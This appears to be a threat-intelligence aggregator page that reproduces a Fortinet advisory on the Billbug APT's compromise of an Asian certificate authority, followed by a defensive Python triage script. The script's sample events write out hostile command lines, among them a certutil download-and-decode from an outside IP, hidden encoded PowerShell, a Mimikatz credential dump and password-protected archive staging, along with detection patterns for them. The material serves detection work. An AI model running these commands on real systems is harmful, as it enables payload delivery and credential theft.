One Article Review

The article:
Source Fortinet ThreatSignal
Identifier 8156663
Publication date 2022-11-21 22:02:17 (seen: 2022-11-22 07:05:46)
Title APT Billbug Victimized Asian Certification Authority and Government Agencies
Text FortiGuard Labs is aware of a report that the APT group "Billbug" compromised a certificate authority (CA) as well as multiple government and defense organizations in Asia. Also known as Lotus Blossom and Thrip, the group has reportedly been active since 2009 and uses the custom backdoors "Hannotog" and "Sagerunex" alongside tools already present on compromised machines.

Why is this Significant?
This is significant because the Billbug APT group targeted a certificate authority (CA). Should the CA's signing keys or certificates be compromised, the attacker could use them to sign malware so that it evades detection by security solutions, and to issue certificates that let it intercept HTTPS communications. The reports also indicate that multiple organizations in the government and defense sectors in Asia were compromised by Billbug.

What is Billbug APT?
Billbug, also known as Lotus Blossom and Thrip, is a threat actor reportedly active since at least 2009, with interests in U.S. organizations as well as government, defense, and communications organizations in Southeast Asia. Its primary motive is thought to be espionage. Billbug employs living-off-the-land techniques alongside custom malware. The tools reportedly used by Billbug are: Hannotog backdoor, Sagerunex backdoor, AdFind, Certutil, LogMeIn, Mimikatz, NBTscan, Ping, Port Scanner, PowerShell, PsExec, Route, Tracert, Winmail, WinRAR, WinSCP.

What is the Status of Coverage?
FortiGuard Labs detects the files in the report with the following AV signatures: W32/Agent.QTP!tr, W32/Elsentric.J!tr, W32/Generic.A!tr, W32/PossibleThreat, W64/Agentb.F!tr, W64/Agent.LF!tr, W64/Elsentric.E!tr, W64/Elsentric.G!tr, Malicious_Behavior.SB, PossibleThreat.PALLAS.H, Riskware/Kryptik.
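Most of the tools in that list are legitimate administration utilities, so AV signatures for the two backdoors are only part of the coverage picture; the rest is spotting how those utilities are invoked and how several of them cluster on one host. The following is an added example, not code from the FortiGuard advisory or from Fortinet: it scores constructed Sysmon-style process-creation events against invocation patterns for the Billbug toolset. The rule patterns, weights, escalation threshold and sample events are illustrative assumptions, not indicators from the report.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample events (not from the advisory). Fields mimic Sysmon
# Event ID 1: UTC time, host, user, image path, command line.
SAMPLE_EVENTS = [
    ("2022-11-20T08:01:10", "WS-17", "corp\\jdoe", "C:\\Windows\\System32\\certutil.exe",
     "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\\Users\\Public\\a.txt"),
    ("2022-11-20T08:01:32", "WS-17", "corp\\jdoe", "C:\\Windows\\System32\\certutil.exe",
     "certutil.exe -decode C:\\Users\\Public\\a.txt C:\\Users\\Public\\svc.exe"),
    ("2022-11-20T08:02:05", "WS-17", "corp\\jdoe", "C:\\Users\\Public\\AdFind.exe",
     "AdFind.exe -f (objectcategory=computer) -csv"),
    ("2022-11-20T08:03:40", "WS-17", "corp\\jdoe", "C:\\Windows\\System32\\PING.EXE",
     "ping -n 1 10.0.0.12"),
    ("2022-11-20T08:04:15", "WS-17", "corp\\jdoe", "C:\\Windows\\System32\\TRACERT.EXE",
     "tracert 10.0.0.12"),
    ("2022-11-20T08:05:50", "WS-17", "corp\\jdoe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("2022-11-20T09:10:00", "WS-17", "corp\\jdoe", "C:\\Users\\Public\\x.exe",
     "x.exe privilege::debug sekurlsa::logonpasswords"),
    ("2022-11-20T09:12:00", "WS-17", "corp\\jdoe", "C:\\Program Files\\WinRAR\\Rar.exe",
     "Rar.exe a -hpP@ss C:\\Users\\Public\\out.rar C:\\Share\\Finance"),
    # Benign admin activity on another host: certutil verifying a cert, one ping.
    ("2022-11-20T10:00:00", "WS-22", "corp\\admin", "C:\\Windows\\System32\\certutil.exe",
     "certutil.exe -verify C:\\Temp\\server.cer"),
    ("2022-11-20T10:05:00", "WS-22", "corp\\admin", "C:\\Windows\\System32\\PING.EXE",
     "ping -n 4 fileserver01"),
]


@dataclass(frozen=True)
class Rule:
    name: str
    image: str    # regex matched against the image file name (case-insensitive)
    cmdline: str  # regex searched in the command line; "" means any invocation
    weight: int   # assumed severity weight, summed per host


# Assumed invocation patterns: built-ins (certutil, ping, tracert, route,
# PowerShell) only count with suspicious arguments; tools that have no
# business on a workstation count on sight; Mimikatz is matched by its
# module syntax regardless of the (often renamed) image name.
RULES = [
    Rule("certutil download/decode", r"^certutil\.exe$", r"-(urlcache|decode|encode)\b", 3),
    Rule("AdFind AD enumeration", r"^adfind\.exe$", "", 3),
    Rule("Mimikatz credential dump", r".*", r"sekurlsa::|lsadump::|privilege::debug", 5),
    Rule("PsExec remote execution", r"^psexec(64)?\.exe$", "", 2),
    Rule("NBTscan sweep", r"^nbtscan\.exe$", "", 2),
    Rule("PowerShell encoded/hidden", r"^powershell\.exe$",
         r"(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring)", 3),
    Rule("WinRAR password-protected archive (staging)", r"^(win)?rar\.exe$", r"\ba\b.*\s-hp", 3),
    Rule("WinSCP transfer channel", r"^winscp\.exe$", "", 2),
    Rule("LogMeIn remote access", r"^logmein.*\.exe$", "", 2),
    Rule("host recon (ping/tracert/route)", r"^(ping|tracert|route)\.exe$", "", 1),
]


def triage(events):
    """Return {host: {"score": int, "hits": [(time, rule name, cmdline), ...]}}."""
    findings = defaultdict(lambda: {"score": 0, "hits": []})
    for time, host, _user, image, cmdline in events:
        base = image.rsplit("\\", 1)[-1]
        for rule in RULES:
            if not re.match(rule.image, base, re.I):
                continue
            if rule.cmdline and not re.search(rule.cmdline, cmdline, re.I):
                continue
            findings[host]["score"] += rule.weight
            findings[host]["hits"].append((time, rule.name, cmdline))
    return dict(findings)


def escalate(findings, threshold=8):
    """Hosts whose summed score reaches the (assumed) threshold, highest first.
    A lone ping or a certutil -verify stays below it; the clustered chain does not."""
    ranked = sorted(findings.items(), key=lambda kv: -kv[1]["score"])
    return [host for host, f in ranked if f["score"] >= threshold]


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for host in escalate(result):
        print(f"{host}: score {result[host]['score']}")
        for time, name, cmdline in result[host]["hits"]:
            print(f"  {time}  {name}: {cmdline}")
```

The per-host sum is what makes this useful against a living-off-the-land actor: each of ping, tracert and a certutil call is noise on its own, but the same user running certutil to fetch and decode a payload, AdFind, a hidden encoded PowerShell, Mimikatz module syntax and a password-protected RAR of a file share within an hour is the pattern worth escalating.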
Sent Yes
Tags Malware Threat
Stories
Rating ★★★★


The article does not appear to have been picked up after its publication.


The article does not appear to be a repeat of an earlier one.